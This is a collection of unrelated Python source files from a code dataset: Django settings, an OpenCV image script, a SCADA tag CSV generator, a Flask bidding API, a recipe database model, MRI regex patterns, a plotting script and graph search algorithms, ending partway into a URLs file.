'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'sekizai.context_processors.sekizai',\n 'cms.context_processors.cms_settings',\n ],\n },\n },\n]\n\nALLOWED_HOSTS = ['*']\nCMS_TEMPLATES = (\n ('workbench/page.html', _(u'Etusivu')),\n)\nCMS_PLACEHOLDER_CONF = {\n # Docs: http://docs.django-cms.org/en/latest/reference/configuration.html#cms-placeholder-conf\n}\nFILER_CANONICAL_URL = 'share/'\nFILER_IMAGE_USE_ICON = True\nLANGUAGE_CODE = 'fi'\nLANGUAGES = [\n ('fi', 'Suomi'),\n]\nMEDIA_ROOT = os.path.join(VAR_ROOT, 'media')\nMEDIA_URL = '/media/'\nROOT_URLCONF = 'workbench.urls'\nSITE_ID = 1\nSTATIC_ROOT = os.path.join(VAR_ROOT, 'static')\nSTATIC_URL = '/static/'\nTHUMBNAIL_HIGH_RESOLUTION = True # http://django-filer.readthedocs.io/en/latest/installation.html#configuration\nTHUMBNAIL_PROCESSORS = (\n 'easy_thumbnails.processors.colorspace',\n 'easy_thumbnails.processors.autocrop',\n 'filer.thumbnail_processors.scale_and_crop_with_subject_location',\n 'easy_thumbnails.processors.filters',\n)\nTIME_ZONE = 'Europe/Helsinki'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\nWSGI_APPLICATION = 'workbench.wsgi.application'\n\nvars().update(env.email_url(\n default=('consolemail://' if DEBUG else 'smtp://localhost:25')\n))\n","sub_path":"workbench/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"149405368","text":"import cv2\r\nimport numpy as np\r\n\r\nimage = cv2.imread(\"gtr.jpg\")\r\ncv2.imshow(\"original\", image)\r\n\r\nprint (image.shape) #row,col,channels\r\n\r\nLframe1 = image[0:720, 0:400]\r\nCframe1 = image[0:720, 400:880]\r\nRframe1 = image[0:720,880:1280]\r\n\r\n(h,w) = Lframe1.shape[:2]\r\ncenter=(w/2,h/2)\r\nM = cv2.getRotationMatrix2D(center, 180, 1.0)\r\nLframe1flip = cv2.warpAffine(image[0:720, 0:400], M, (w,h))\r\n \r\nputitback = np.concatenate((Lframe1flip,Cframe1, Rframe1), axis=1)\r\ncv2.imshow('flipped',Lframe1flip) \r\ncv2.imshow('cropped',Rframe1) \r\ncv2.imshow('stitched',putitback)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n","sub_path":"cropcv.py","file_name":"cropcv.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"440706780","text":"#!/usr/bin/env python3\r\n\r\nimport csv\r\n#from website_example import first_gate, last_gate, gate_num, line\r\n\r\nclass SGDiscrete:\r\n def __init__(self, first_gate, last_gate, gate_number, conveyor_type, line):\r\n conveyor_types = {\"Distribution\": \"D\", \"Transfer\": \"T\", \"Accumulation\": \"A\", \"Weigher Feeder\": \"WF\", \"Modulation\": \"X\"}\r\n self.first_gate = first_gate\r\n self.last_gate = last_gate\r\n self.gate_number = gate_number\r\n self.conveyor_type = conveyor_type\r\n self.conveyor_type_letter = conveyor_types[conveyor_type]\r\n self.line = line\r\n\r\n\r\n def features(self):\r\n \"\"\"Features for IO Discrete Tags\"\"\"\r\n dict_data = []\r\n my_dict = {\r\n \":IODisc\":\"\",\r\n \"Group\": \"$System\",\r\n \"Comment\": \"\",\r\n \"Logged\": \"No\",\r\n \"EventLogged\": \"No\",\r\n \"EventLoggingPriority\": 0,\r\n \"RetentiveValue\": \"No\",\r\n \"InitialDisc\": \"Off\",\r\n \"OffMsg\": \"\",\r\n \"OnMsg\": \"\",\r\n \"AlarmState\": \"None\",\r\n \"AlarmPri\": 1,\r\n \"DConversion\": \"Direct\",\r\n \"AccessName\": \"HC\",\r\n \"ItemUseTagname\": \"No\",\r\n \"ItemName\": \"\",\r\n \"ReadOnly\": \"No\",\r\n 
\"AlarmComment\": \"\",\r\n \"AlarmAckModel\": 0,\r\n \"DSCAlarmDisable\": 0,\r\n \"DSCAlarmInhibitor\": \"\",\r\n \"SymbolicName\": \"\"\r\n }\r\n\r\n dict_data.append(my_dict)\r\n\r\n return(my_dict)\r\n\r\n\r\n\r\n def auto_pb(self):\r\n dict_data = []\r\n for i in range(self.first_gate, self.last_gate + 1):\r\n dict1 = self.features()\r\n dict1[\":IODisc\"] = \"YSG{}M{}{}{}_Auto_PB\".format(self.gate_number, self.conveyor_type_letter, i, self.line)\r\n dict1[\"ItemName\"] = \"YSG{}M{}{}{}.AutoPB\".format(self.gate_number, self.conveyor_type_letter, i, self.line)\r\n\r\n dict_data.append(dict1)\r\n\r\n return(dict_data)\r\n\r\n def manual_mode(self):\r\n dict_data = self.auto_pb()\r\n for i in range(self.first_gate, self.last_gate + 1):\r\n dict1 = self.features()\r\n dict1[\":IODisc\"] = \"YSG{}M{}{}{}_Manual_Mode\".format(self.gate_number, self.conveyor_type_letter, i, self.line)\r\n dict1[\"ItemName\"] = \"YSG{}M{}{}{}.ManualMode\".format(self.gate_number, self.conveyor_type_letter, i, self.line)\r\n\r\n dict_data.append(dict1)\r\n\r\n return(dict_data)\r\n\r\n def manual_close(self):\r\n dict_data = self.manual_mode()\r\n for i in range(self.first_gate, self.last_gate + 1):\r\n dict1 = self.features()\r\n dict1[\":IODisc\"] = \"YSG{}M{}{}{}_Manual_Close\".format(self.gate_number, self.conveyor_type_letter, i, self.line)\r\n dict1[\"ItemName\"] = \"YSG{}M{}{}{}.ManualClose\".format(self.gate_number, self.conveyor_type_letter, i, self.line)\r\n\r\n dict_data.append(dict1)\r\n\r\n return(dict_data)\r\n\r\n def manual_open(self):\r\n dict_data = self.manual_close()\r\n for i in range(self.first_gate, self.last_gate + 1):\r\n dict1 = self.features()\r\n dict1[\":IODisc\"] = \"YSG{}M{}{}{}_Manual_Open\".format(self.gate_number, self.conveyor_type_letter, i, self.line)\r\n dict1[\"ItemName\"] = \"YSG{}M{}{}{}.ManualOpen\".format(self.gate_number, self.conveyor_type_letter, i, self.line)\r\n\r\n dict_data.append(dict1)\r\n\r\n return(dict_data)\r\n\r\n def open(self):\r\n dict_data = self.manual_open()\r\n for i in range(self.first_gate, self.last_gate + 1):\r\n dict1 = self.features()\r\n dict1[\":IODisc\"] = \"YSG{}M{}{}{}_Open\".format(self.gate_number, self.conveyor_type_letter, i, self.line)\r\n dict1[\"ItemName\"] = \"YSG{}M{}{}{}.Open\".format(self.gate_number, self.conveyor_type_letter, i, self.line)\r\n\r\n dict_data.append(dict1)\r\n\r\n return(dict_data)\r\n\r\n def create_tags(self):\r\n dict_data = self.stat_off()\r\n\r\n return(dict_data)\r\n \r\n def create_csv(self):\r\n csv_file = \"csv-files/discrete/slide_gates_{}_{}.csv\".format(self.conveyor_type, self.line)\r\n dict_data = self.open()\r\n csv_columns = list(dict_data[0].keys())\r\n\r\n try:\r\n with open(csv_file, 'w') as csvfile:\r\n writer = csv.DictWriter(csvfile, fieldnames=csv_columns)\r\n writer.writeheader()\r\n for data in dict_data:\r\n writer.writerow(data)\r\n except IOError as e:\r\n print(e)\r\n\r\nif __name__ == \"__main__\":\r\n sg = SGDiscrete(1, 5, 1, \"Distribution\", \"C\")\r\n sg.create_csv()\r\n","sub_path":"tagcreator/discrete/sg_discrete.py","file_name":"sg_discrete.py","file_ext":"py","file_size_in_byte":4627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"576489497","text":"# -*- coding: utf-8 -*-\nimport os\nfrom flask import Blueprint, request, send_file\nfrom flask.ext.login import current_user\nfrom ...message import message\nfrom ...models import *\nfrom ...utils import convert_to_timestamp, jsonify, login_required, 
remove_if_startwith\n\nmain = Blueprint('api_main', __name__)\n\nsettings = current_app.config\n\n@main.route('/enter.jpg', methods=['GET'])\ndef first_img():\n    startpage = StartPage.query.filter(StartPage.is_active == True).one()\n    img_path = os.path.join(settings['STATIC_BASE_ROOT'], remove_if_startwith(startpage.image, '/static/'))\n    return send_file(img_path, mimetype='image/jpeg')\n\n\n@main.route('/carousel', methods=['GET'])\ndef carousel_list():\n    carousel_list1 = Carousel.query.order_by(Carousel.order_num.desc()).all()\n    data = {\n        'data': [{'title': carousel.name, 'imgUrl': carousel.image} for carousel in carousel_list1]\n    }\n    return jsonify(data)\n\n\n@main.route('/province', methods=['GET'])\ndef province_list():\n    area_list = Area.query.filter(Area.parent_id == None)\\\n        .order_by(Area.order_num.desc(), Area.create_date.desc()).all()\n    data = [{'id': area.id, 'name': area.name} for area in area_list]\n    return jsonify(data)\n\n\n@main.route('/city', methods=['GET'])\ndef city_list():\n    province_id = int(request.args['province_id'])\n    area_list = Area.query.filter(Area.parent_id == province_id)\\\n        .order_by(Area.order_num.desc(), Area.create_date.desc()).all()\n    if not area_list:\n        area = Area.query.get(province_id)\n        area_list = [area]\n    data = [{'id': area.id, 'name': area.name} for area in area_list]\n    return jsonify(data)\n\n\n@main.route('/me', methods=['GET'])\n@login_required\ndef my_info():\n    supplier = current_user.supplier\n\n    winCount = Project.query.filter(Project.supplier_id==supplier.id).count()\n    data = {\n        'imgUrl': '',\n        'companyName': supplier.company_name,\n        'mail': supplier.email,\n        'authenticated': supplier.status,\n        'mark': supplier.service_score,\n        'bidCount': len(supplier.bids),\n        'winCount': winCount,\n        'id': supplier.id,\n    }\n    return jsonify(data)\n\n\n@main.route('/comment', methods=['GET'])\n@login_required\ndef my_comment():\n    supplier = current_user.supplier\n\n    comment_list = supplier.comments\n    data = [\n        {\n            'id': comment.id,\n            'readFlag': comment.is_read,\n            'title': '',\n            'content': comment.content,\n            'mark': comment.service_score,\n            'commentNum': 0\n        }\n        for comment in comment_list\n    ]\n    return jsonify(data)\n\n\n@main.route('/comment/<int:comment_id>', methods=['GET'])\ndef comment_info(comment_id):\n    comment = Comment.query.get(comment_id)\n\n    data = {\n        'title': '',\n        'content': comment.content,\n        'serviceMark': comment.service_score,\n        'costMark': comment.cost_score,\n        'quantityMark': comment.quality_score,\n        'timeMark': comment.time_score,\n        'comments': [],\n    }\n    return jsonify(data)\n\n\n@main.route('/comment/<int:comment_id>', methods=['POST'])\n@catch_db_error\n@login_required\ndef comment_appeal(comment_id):\n    appeal = request.form['content']\n\n    comment = Comment.query.get(comment_id)\n    comment.appeal = appeal\n    db.session.commit()\n\n    return jsonify(message.ok(u'申诉提交成功'))\n\n\n@main.route('/bid', methods=['GET'])\n@login_required\ndef bid_list():\n    type = request.args['type'].strip()\n    start = int(request.args['start'])\n\n    supplier = current_user.supplier\n\n    if type == 'bid':\n        bid_list1 = Bid.query.filter(Bid.supplier_id == supplier.id).order_by(Bid.create_date.desc()) \\\n            .offset(start).limit(10).all()\n    elif type == 'win':\n        bid_list1 = Bid.query.join(Project).filter(Bid.supplier_id == supplier.id, Bid.id == Project.bid_id) \\\n            .order_by(Bid.create_date.desc()).offset(start).limit(10).all()\n    else:\n        return jsonify(message.error(u'类型不正确'))\n\n    data = []\n    for bid in bid_list1:\n        project = bid.project\n        data.append(\n            {\n                'type': 
project.business_scope.name,\n 'imgUrl': project.building.logo,\n 'title': project.name,\n 'subTitle': project.building.name,\n 'state': project.status.get_display_name(),\n 'from': convert_to_timestamp(project.lead_start_date),\n 'to': convert_to_timestamp(project.lead_end_date),\n 'publishTime': convert_to_timestamp(project.publish_date),\n 'deadline': convert_to_timestamp(project.due_date),\n 'id': project.id,\n 'price': project.price_range.get_display_name(),\n }\n )\n return jsonify(data)\n\n\n@main.route('/enterInfoValidated', methods=['GET'])\n@login_required\ndef check_supplier_status():\n supplier = current_user.supplier\n\n result = supplier.status == Supplier.STATUS_PASS\n return jsonify(result)\n\n\n@main.route('/project_supplier', methods=['GET'])\ndef project_supplier():\n project_id = int(request.args['project_id'])\n\n project = Project.query.get(project_id)\n if not project:\n return jsonify(message.error(u'项目不存在'))\n\n if not project.supplier_id:\n return jsonify(message.error(u'供应商不存在'))\n\n supplier = Supplier.query.get(project.supplier_id)\n data = {\n 'companyName': supplier.company_name,\n 'contactName': supplier.company_contact,\n 'tel': supplier.company_contact_telephone,\n 'position': supplier.area and supplier.area.full_name,\n 'addrSpec': supplier.company_address,\n 'bank': supplier.deposit_bank,\n 'account': supplier.bank_account,\n }\n return jsonify(data)\n","sub_path":"yuanyang/views/api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"606139492","text":"from DataConnection import DataConnection\r\nimport Utilities\r\nimport Ingredient\r\nfrom Amount_Units import Amount_Units\r\nfrom sys import exc_info\r\n\r\nclass Recipe:\r\n recipeTable = \"Recipe\"\r\n recipeElementTable = \"Recipe_Element\"\r\n recipeIdColumn = \"Recipe_ID\"\r\n recipeNameColumn = \"Recipe_Name\"\r\n recipeDescriptionColumn = \"Description\"\r\n amountNameColumn = \"Amount\" \r\n \r\n typeTable = \"Type\"\r\n typeIdColumn = \"Type_ID\"\r\n typeNameColumn = \"Type\"\r\n cookbookTypeIdColumn = \"Cookbook_Type_ID\"\r\n isCookbookColumn = \"isCookbook\"\r\n \r\n isNotCookbook = 0\r\n isCookbook = 1\r\n \r\n mainTypeId = 1\r\n sideTypeId = 2\r\n otherTypeId = 3\r\n \r\n sideALabelPrefix = \"side_A_\"\r\n sideBLabelPrefix = \"side_B_\" \r\n \r\n whereTypeId =\"{0} JOIN {5} ON {0}.{1} = {5}.{1} WHERE {5}.{3} = {4} AND ({0}.{1} = {2} OR {0}.{1} = \".format(recipeTable, typeIdColumn, otherTypeId, isCookbookColumn, isNotCookbook, typeTable)\r\n whereMainTypeId = \"{} {})\".format(whereTypeId, str(mainTypeId))\r\n whereSideTypeId = \"{} {})\".format(whereTypeId, str(sideTypeId))\r\n\r\n def __init__(self, recipeId, recipeName, recipeType, cookbookType, ingredients, description):\r\n self.recipeId = recipeId\r\n self.recipeName = Utilities.normalizeCasing(recipeName)\r\n self.recipeType = recipeType\r\n self.cookbookType = cookbookType\r\n self.ingredients = ingredients\r\n self.description = description\r\n\r\n @classmethod\r\n def createNewRecipe(cls, recipeName, recipeType, cookbookType, ingredients, description): \r\n recipeId = Utilities.generateNewKey(Recipe.recipeIdColumn, Recipe.recipeTable)\r\n \r\n return Recipe(recipeId, recipeName, recipeType, cookbookType, ingredients, description)\r\n \r\n @classmethod\r\n def getExistingRecipe(cls, recipeId, recipeName):\r\n if recipeId:\r\n known = recipeId\r\n select = Recipe.recipeNameColumn\r\n where = 
Recipe.recipeIdColumn\r\n whereIsId = True\r\n elif recipeName:\r\n known = recipeName\r\n select = Recipe.recipeIdColumn\r\n where = Recipe.recipeNameColumn\r\n whereIsId = False\r\n \r\n recipeInfo = Utilities.getKnownInfo(known, select, where, Recipe.recipeTable, whereIsId)\r\n recipeType = Utilities.getKnownInfo(Utilities.getKnownInfo(known, Recipe.typeIdColumn, where, Recipe.recipeTable, whereIsId), Recipe.typeNameColumn, Recipe.typeIdColumn, Recipe.typeTable, True)\r\n \r\n try:\r\n cookbookType = Utilities.getKnownInfo(Utilities.getKnownInfo(known, Recipe.cookbookTypeIdColumn, where, Recipe.recipeTable, whereIsId), Recipe.typeNameColumn, Recipe.typeIdColumn, Recipe.typeTable, True)\r\n except:\r\n cookbookType = \"None\"\r\n \r\n description = Utilities.getKnownInfo(known, Recipe.recipeDescriptionColumn, where, Recipe.recipeTable, whereIsId)\r\n if description == None: description = \"\"\r\n \r\n if recipeId: \r\n ingredients = Ingredient.Ingredient.getRecipeIngredients(recipeId)\r\n return Recipe(recipeId, recipeInfo, recipeType, cookbookType, ingredients, description)\r\n elif recipeName:\r\n ingredients = Ingredient.Ingredient.getRecipeIngredients(recipeInfo)\r\n return Recipe(recipeInfo, recipeName, recipeType, cookbookType, ingredients, description)\r\n\r\n def add(self):\r\n connection = DataConnection()\r\n \r\n recipeQuery = \"INSERT INTO {} ({}, {}, {}, {}, {}) VALUES (%s, %s, %s, %s, %s);\".format(Recipe.recipeTable, Recipe.recipeIdColumn, Recipe.recipeNameColumn, Recipe.typeIdColumn, Recipe.cookbookTypeIdColumn, Recipe.recipeDescriptionColumn)\r\n recipeInsertValues = (self.recipeId, self.recipeName, Utilities.getKnownInfo(self.recipeType, self.typeIdColumn, self.typeNameColumn, self.typeTable, False), Utilities.getKnownInfo(self.cookbookType, self.typeIdColumn, self.typeNameColumn, self.typeTable, False), self.description)\r\n connection.updateData(recipeQuery, recipeInsertValues)\r\n \r\n self.insertIngredients(connection, returnQueryOnly=False)\r\n #for ingredient in self.ingredients:\r\n #ingredientId = Utilities.getKnownInfo(ingredient['name'], Ingredient.Ingredient.ingredientIdColumn, Ingredient.Ingredient.ingredientNameColumn, Ingredient.Ingredient.ingredientTable, False)\r\n #amount = ingredient['amount']\r\n #amountUnitId = Utilities.getKnownInfo(ingredient['units'], Amount_Units.unitIdColumn, Amount_Units.unitNameColumn, Amount_Units.amountUnitsTable, False)\r\n \r\n #bridgeQuery = \"INSERT INTO {} ({}, {}, {}, {}) VALUES (%s, %s, %s, %s); \".format(Recipe.recipeElementTable, Recipe.recipeIdColumn, Ingredient.Ingredient.ingredientIdColumn, Recipe.amountNameColumn, Amount_Units.unitIdColumn)\r\n #bridgeInsertValues = (self.recipeId, ingredientId, amount, amountUnitId) \r\n #connection.updateData(bridgeQuery, bridgeInsertValues)\r\n \r\n connection.closeConnection()\r\n print(\"Successfully added \" + \"'\" + self.recipeName + \"' \" + \"recipe.\")\r\n \r\n def update(self, newRecipeName, newRecipeType, newCookbookType, newIngredientsList, newDescription, updateIngredients = True):\r\n queryList = []\r\n insertValues = []\r\n updateStatus = False\r\n \r\n if self.recipeName != newRecipeName:\r\n self.recipeName = newRecipeName\r\n queryList.append(\"UPDATE {} SET {} = %s WHERE {} = {};\".format(Recipe.recipeTable, Recipe.recipeNameColumn, Recipe.recipeIdColumn, self.recipeId))\r\n insertValues.append((self.recipeName,))\r\n if self.recipeType != newRecipeType:\r\n self.recipeType = newRecipeType\r\n queryList.append(\"UPDATE {} SET {} = %s WHERE {} = 
{};\".format(Recipe.recipeTable, Recipe.typeIdColumn, Recipe.recipeIdColumn, self.recipeId))\r\n insertValues.append((Utilities.getKnownInfo(self.recipeType, Recipe.typeIdColumn, Recipe.typeNameColumn, Recipe.typeTable, False),))\r\n if self.cookbookType != newCookbookType:\r\n self.cookbookType = newCookbookType\r\n queryList.append(\"UPDATE {} SET {} = %s WHERE {} = {};\".format(Recipe.recipeTable, Recipe.cookbookTypeIdColumn, Recipe.recipeIdColumn, self.recipeId))\r\n insertValues.append((Utilities.getKnownInfo(self.cookbookType, Recipe.typeIdColumn, Recipe.typeNameColumn, Recipe.typeTable, False),))\r\n if self.description != newDescription:\r\n self.description = newDescription\r\n \r\n if newDescription is not None:\r\n queryList.append(\"UPDATE {} SET {} = %s WHERE {} = {};\".format(Recipe.recipeTable, Recipe.recipeDescriptionColumn, Recipe.recipeIdColumn, self.recipeId))\r\n insertValues.append((self.description,))\r\n if updateIngredients:\r\n self.ingredients = newIngredientsList\r\n ingredientsQueryList, ingredientInsertValues = self.insertIngredients(None, returnQueryOnly=True)\r\n queryList.append(\"DELETE FROM {} WHERE {} = %s;\".format(Recipe.recipeElementTable, Recipe.recipeIdColumn))\r\n insertValues.append((self.recipeId,))\r\n \r\n for count in range(len(ingredientsQueryList)):\r\n queryList.append(ingredientsQueryList[count])\r\n insertValues.append(ingredientInsertValues[count])\r\n \r\n try:\r\n for element in range(len(queryList)):\r\n query = queryList[element]\r\n values = insertValues[element]\r\n \r\n connection = DataConnection()\r\n connection.updateData(query, values)\r\n connection.closeConnection()\r\n \r\n updateStatus = True\r\n except:\r\n updateStatus = exc_info()\r\n\r\n return updateStatus\r\n \r\n def delete(self):\r\n recipeElementQuery = \"DELETE FROM {} WHERE {} = %s;\".format(Recipe.recipeElementTable, Recipe.recipeIdColumn)\r\n recipeQuery = \"DELETE FROM {} WHERE {} = %s;\".format(Recipe.recipeTable, Recipe.recipeIdColumn)\r\n bindValue = (self.recipeId,)\r\n \r\n try:\r\n connection = DataConnection()\r\n connection.updateData(recipeElementQuery, bindValue)\r\n connection.updateData(recipeQuery, bindValue)\r\n connection.closeConnection()\r\n \r\n return True\r\n except:\r\n return exc_info()\r\n \r\n def insertIngredients(self, connectionInstance, returnQueryOnly = False):\r\n bridgeQueryList = []\r\n bridgeInsertTupleList = []\r\n \r\n for ingredient in self.ingredients:\r\n ingredientId = Utilities.getKnownInfo(ingredient['name'], Ingredient.Ingredient.ingredientIdColumn, Ingredient.Ingredient.ingredientNameColumn, Ingredient.Ingredient.ingredientTable, False)\r\n amount = ingredient['amount']\r\n amountUnitId = Utilities.getKnownInfo(ingredient['units'], Amount_Units.unitIdColumn, Amount_Units.unitNameColumn, Amount_Units.amountUnitsTable, False)\r\n \r\n bridgeQuery = \"INSERT INTO {} ({}, {}, {}, {}) VALUES (%s, %s, %s, %s); \".format(Recipe.recipeElementTable, Recipe.recipeIdColumn, Ingredient.Ingredient.ingredientIdColumn, Recipe.amountNameColumn, Amount_Units.unitIdColumn)\r\n bridgeInsertValues = (self.recipeId, ingredientId, amount, amountUnitId)\r\n if not returnQueryOnly:\r\n connectionInstance.updateData(bridgeQuery, bridgeInsertValues)\r\n else:\r\n bridgeQueryList.append(bridgeQuery)\r\n bridgeInsertTupleList.append((bridgeInsertValues))\r\n \r\n if returnQueryOnly:\r\n return bridgeQueryList, bridgeInsertTupleList\r\n\r\n def __str__(self):\r\n newLine = \"\\n\"\r\n tab = \" \" \r\n \r\n message = \"--- Summary ---\" + 
newLine\r\n        message += \"Recipe name: \" + self.recipeName + newLine\r\n        message += \"Recipe type: \" + str(self.recipeType) + newLine\r\n        message += \"Cookbook type: \" + str(self.cookbookType) + newLine\r\n        \r\n        if self.ingredients:\r\n            message += \"Ingredients: \" + newLine\r\n            for ingredient in self.ingredients:\r\n                message += \"{} {} {} {} {}\".format(tab, ingredient['amount'], ingredient['units'], ingredient['name'], newLine)\r\n        else:\r\n            message += \"Ingredients: None\" + newLine\r\n        \r\n        message += \"Description: \" + str(self.description)\r\n\r\n        return message","sub_path":"RecipeModel.py","file_name":"RecipeModel.py","file_ext":"py","file_size_in_byte":10633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"68363477","text":"cat = 'tool'\n\n# Import base\nfrom base import *\n\n# Check spiral\npriptn_spiral = [\n    'spiral',\n]\nsecptn_spiral = [\n    'mri',\n    'bold',\n    'imag',\n    'scan',\n    'data',\n    'pulse',\n    'acqui',\n    'sequence',\n]\ndef checkspiral(txt, **conargs):\n    return contextsearch(txt, priptn_spiral, secptn_spiral, ichar='.', **conargs)\n\n\ntags = {}\n\n# Structural\ntags['mprage'] = [\n    '\\Wmp%srage\\W' % (delimptn),\n]\n\ntags['spgr'] = [\n    '\\Wspgr\\W',\n]\n\n# Trajectory\ntags['epi'] = [\n    'echo%splanar' % (delimptn),\n    re.compile('EPI'),\n]\n\ntags['spiral'] = [\n    'spiral%sin\\W' % (delimptn),\n    'spiral%sout\\W' % (delimptn),\n    checkspiral,\n]\n\n# Sequence\ntags['gradient'] = [\n    'gradient%secho' % (delimptn),\n    'gradient%srecall(?:ed)?' % (delimptn),\n]\n\ntags['spin'] = [\n    'spin%secho' % (delimptn),\n]\n\ntags['grase'] = [\n    re.compile('GRASE'),\n]\n\n# Acceleration method\ntags['sense'] = [\n    re.compile('SENSE'),\n    'sensitivity%sencoded' % (delimptn),\n]\n\ntags['grappa'] = [\n    re.compile('GRAPPA'),\n]\n\ntags['presto'] = [\n    re.compile('PRESTO'),\n]\n\ntags['smash'] = [\n    re.compile('SMASH'),\n]\n","sub_path":"neurotrends/pattern/pulse.py","file_name":"pulse.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"64534298","text":"import numpy as np\nimport time\nimport sys\nimport matplotlib.pyplot as plt\nimport math\n\nstart_time = time.time()\n\n# set up parameters\ndata_root_path = \"/home/dc-bamb1/GRChombo/Analysis/data/Y00_integration_data/\"\nfile_names = {}\na_list = [\"0\", \"0.99\"]\nfile_names[\"0\"] = \"run0067_KNL_l0_m0_a0_Al0_mu1_M1_KerrSchild\"\nfile_names[\"0.99\"] = \"run0068_KNL_l0_m0_a0.99_Al0_mu1_M1_KerrSchild\"\nnumber = 1250\nmu = 1\nM = 1\nlin_or_log = False\nrho_colours = [\"r-\", \"g--\"]\nJ_colours = [\"b-\", \"b--\"]\nsim_time = 0  # holds the simulation time read from the data; a plain 'time' would shadow the time module imported above\n\n### get data and plot profile for each a and each lm\n\nscale = \"\"\nif (lin_or_log):\n\tscale = \"linear\"\nelse:\n\tscale = \"log\"\n\nfig, ax1 = plt.subplots()\nax2 = ax1.twinx()\nfor i in range(0, len(a_list)):\n\ta = float(a_list[i])\n\tr_plus = M*(1 + math.sqrt(1 - a**2))\n\tfile_name = file_names[a_list[i]] + \"_{:s}_{:s}_n{:06d}.dat\"\n\tdataset_path = data_root_path + file_name\n\t# generate rho data\n\tdata = np.genfromtxt(dataset_path.format(\"rho\", scale, number), skip_header=1)\n\tsim_time = data[1, 0]\n\tr = data[0,1:]/M\n\trho = data[1, 1:]\n\tif (lin_or_log):\n\t\tx = r\n\telse:\n\t\tx = np.log10(r)\n\t# generate S_azimuth data\n\tdata = np.genfromtxt(dataset_path.format(\"J_azimuth\", \"linear\", number), skip_header=1)\n\tS_azimuth = data[1, 1:]\n\t# plot rho\n\tax1.plot(x, np.log10(rho), rho_colours[i], label=\"$\\\\ln(\\\\rho_E)$ l=m=0 
a={:.2f}\".format(a))\n\t# plot S_azimuth\n\tax2.plot(x, S_azimuth, J_colours[i], label=\"$\\\\rho_J$ l=m=0 a={:.2f}\".format(a))\n\t#\nax1.legend(fontsize=8, loc=\"upper left\")\nax2.legend(fontsize=8, loc=\"upper right\")\nax2.set_ylabel(\"$\\\\rho_J$\")\nax1.set_ylabel(\"$\\\\ln(\\\\rho_E)$\")\nif (lin_or_log):\n\txlabel_ = \"$r_{KS}/M$\"\nelse:\n\txlabel_ = \"$\\\\log_{10}(r_{KS}/M)$\"\nax1.set_xlabel(xlabel_)\ndt = 0.5\nax2.set_ylim((-10**-6, 10**-6))\na_max = np.max([float(a_str) for a_str in a_list])\nr_plus_min = 1 + np.sqrt(1 - a_max**2)\nprint(\"r_plus_min = \", r_plus_min)\nif (lin_or_log) :\n\tplt.xlim((1.0, 100))\nelse :\n\tplt.xlim(left=np.log10(r_plus_min))\ntitle = \"$\\\\rho_E$ and $\\\\rho_J$ profile KerrSchild M=1 $\\\\mu$={:.1f}, time = {:.1f}\".format(mu, time) \nplt.title(title)\nplt.legend(fontsize=8)\nplt.tight_layout()\nsave_name = \"/home/dc-bamb1/GRChombo/Analysis/plots/KerrSchild_M{:.1f}_mu{:.1f}_l0_m0_rho_S_azimuth_{:s}_t={:.1f}_plot.png\".format(M, mu, scale, time)\nprint(\"saved \" + save_name)\nplt.savefig(save_name, transparent=False)\nplt.clf()\n","sub_path":"Analysis/scripts/old_scripts/plot_radial_profile_rho_S_azimuth_KS.py","file_name":"plot_radial_profile_rho_S_azimuth_KS.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"89355949","text":"from queue import PriorityQueue, Queue, LifoQueue\n\nfrom node import expand_node\n\n\ndef a_star(root, heuristic_fn, cost_fn):\n fringe = PriorityQueue()\n fringe.put((cost_fn(root) + heuristic_fn(root), root))\n visited = []\n nodes_examined = 0\n while not fringe.empty():\n cost, node = fringe.get()\n\n nodes_examined += 1\n\n if node.goal_test():\n # this is a solution.\n return node, nodes_examined\n\n for successor in node.successors():\n # print(\"added successor!\")\n if node in visited:\n continue\n else:\n visited.append(node)\n fringe.put(\n (cost_fn(successor) + heuristic_fn(successor), successor))\n\n return None, nodes_examined\n\n\ndef BFS(root, node_count_max=None):\n node_num = 0\n fringe = Queue()\n\n # put the root on the fringe\n fringe.put(root)\n\n # in BFS, we treat the fringe as a FIFO queue\n while not fringe.empty() and node_num < node_count_max:\n node = fringe.get()\n node_num += 1\n print(\"Examining Node #%d: %s\" % (node_num, node))\n for child in node.successors():\n node.register_child(child)\n fringe.put(child)\n if node.goal_test():\n return node, node_num\n return None, node_num\n\n\ndef DFS(root, node_count_max=None):\n node_num = 0\n fringe = LifoQueue()\n\n # put the root on the fringe\n fringe.put(root)\n\n # in DFS, we treat the fringe as a LIFO queue\n while not fringe.empty() and node_num < node_count_max:\n node = fringe.get()\n node_num += 1\n print(\"Examining Node #%d: %s\" % (node_num, node))\n for child in node.children:\n fringe.put(child)\n if node.goal_test():\n return node, node_num\n return None, node_num\n","sub_path":"AI/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"23415558","text":"\"\"\"controlinv URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. 
